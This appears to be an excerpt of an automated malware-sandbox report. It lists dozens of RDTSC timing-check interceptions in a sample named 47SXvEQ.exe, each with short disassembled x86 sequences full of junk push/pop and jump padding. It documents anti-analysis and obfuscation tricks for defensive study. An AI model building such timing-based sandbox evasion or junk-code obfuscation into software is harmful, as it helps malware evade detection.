                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A3B16 second address: 10A3B62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000004h 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F87BC5165B8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 movsx edi, di 0x00000029 push eax 0x0000002a pushad 0x0000002b pushad 0x0000002c jmp 00007F87BC5165BDh 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A3B62 second address: 10A3B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A43A0 second address: 10A43A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A43A4 second address: 1085F17 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 sub edi, 642EB8FCh 0x0000000e call dword ptr [ebp+12DC1BB2h] 0x00000014 jmp 00007F87BD02CC98h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jns 00007F87BD02CC86h 0x00000022 jne 00007F87BD02CC86h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E4451 second address: 10E4456 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E4456 second address: 10E4463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F87BD02CC86h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E4463 second address: 10E4485 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F87BC5165C5h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E45FA second address: 10E4600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E4600 second address: 10E4604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E4898 second address: 10E48AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F87BD02CC8Ah 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E48AB second address: 10E48B5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F87BC5165B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E48B5 second address: 10E48BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E48BB second address: 10E48C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E48C1 second address: 10E48C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E48C5 second address: 10E48D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F87BC5165C6h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E48D8 second address: 10E48DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E4A16 second address: 10E4A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E4B8D second address: 10E4BA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F87BD02CC88h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E4BA0 second address: 10E4BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F87BC5165B6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F87BC5165C2h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E4BC3 second address: 10E4BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E74C1 second address: 10E74CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F87BC5165C2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10E74CD second address: 10E74D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 105F08B second address: 105F09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BC5165BDh 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10EA17D second address: 10EA181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10EA181 second address: 10EA185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10EA185 second address: 10EA1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BD02CC93h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F87BD02CC97h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F87BD02CC86h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10EA47D second address: 10EA489 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F87BC5165B6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10EA489 second address: 10EA49E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC8Bh 0x00000009 jnc 00007F87BD02CC86h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10EA49E second address: 10EA4A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10EF8E5 second address: 10EF8EF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F87BD02CC92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10EFD39 second address: 10EFD43 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F87BC5165B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10EFD43 second address: 10EFD54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jnp 00007F87BD02CC94h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10EFD54 second address: 10EFD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F0CE5 second address: 10F0D0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F87BD02CC91h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F0D0F second address: 10F0D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F87BC5165C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F0D30 second address: 10F0D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F0D34 second address: 10F0D3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F26E9 second address: 10F26ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F26ED second address: 10F2706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F87BC5165BBh 0x0000000d je 00007F87BC5165B6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F2706 second address: 10F270A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 104FE1F second address: 104FE25 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 104FE25 second address: 104FE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 104FE2F second address: 104FE35 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F5ADD second address: 10F5AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push ecx 0x0000000a je 00007F87BD02CC86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F5DF5 second address: 10F5E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F87BC5165B6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F98D0 second address: 10F98DC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F87BD02CC8Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F98DC second address: 10F98EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F87BC5165C2h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F9B8B second address: 10F9B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F9B8F second address: 10F9BA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F9D11 second address: 10F9D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007F87BD02CC86h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F87BD02CC98h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F9D3C second address: 10F9D5C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F87BC5165BCh 0x00000011 jnl 00007F87BC5165B6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F9D5C second address: 10F9D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10F9D61 second address: 10F9D66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 110273D second address: 110276B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F87BD02CC8Dh 0x0000000e jmp 00007F87BD02CC98h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 110276B second address: 110276F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1100637 second address: 110063B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 110063B second address: 1100641 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1100641 second address: 1100651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007F87BD02CC86h 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1100651 second address: 110065C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F87BC5165B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 110065C second address: 1100667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1101487 second address: 110148D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 110148D second address: 11014B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007F87BD02CC8Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F87BD02CC8Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11017D1 second address: 11017D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11017D5 second address: 11017E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11017E1 second address: 11017E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11017E5 second address: 11017F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F87BD02CC86h 0x0000000e jno 00007F87BD02CC86h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11017F9 second address: 11017FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1101DCC second address: 1101DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F87BD02CC86h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jc 00007F87BD02CC8Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11020AB second address: 11020EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F87BC5165B6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F87BC5165C9h 0x00000014 pop edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F87BC5165C2h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11020EE second address: 1102103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC91h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1102103 second address: 110210D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 110210D second address: 110213B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC95h 0x00000007 jmp 00007F87BD02CC95h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 110213B second address: 1102141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1102141 second address: 1102145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1102145 second address: 1102149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1105E16 second address: 1105E21 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1105E21 second address: 1105E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1105E27 second address: 1105E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1105F84 second address: 1105F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1105F89 second address: 1105F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1105F8F second address: 1105FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F87BC5165C9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1105FB2 second address: 1105FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 110610D second address: 1106112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 111092E second address: 1110941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1110941 second address: 1110945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1110945 second address: 1110968 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F87BD02CC96h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1110AB7 second address: 1110ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1110ABB second address: 1110AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1110DB2 second address: 1110DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F87BC5165B6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F87BC5165C9h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1110DDC second address: 1110DF9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F87BD02CC98h 0x00000008 jmp 00007F87BD02CC92h 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1110F43 second address: 1110F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1110F49 second address: 1110F82 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F87BD02CC8Ah 0x0000000e jmp 00007F87BD02CC91h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F87BD02CC8Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 111135C second address: 1111360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1111360 second address: 1111366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1111366 second address: 1111389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F87BC5165C9h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
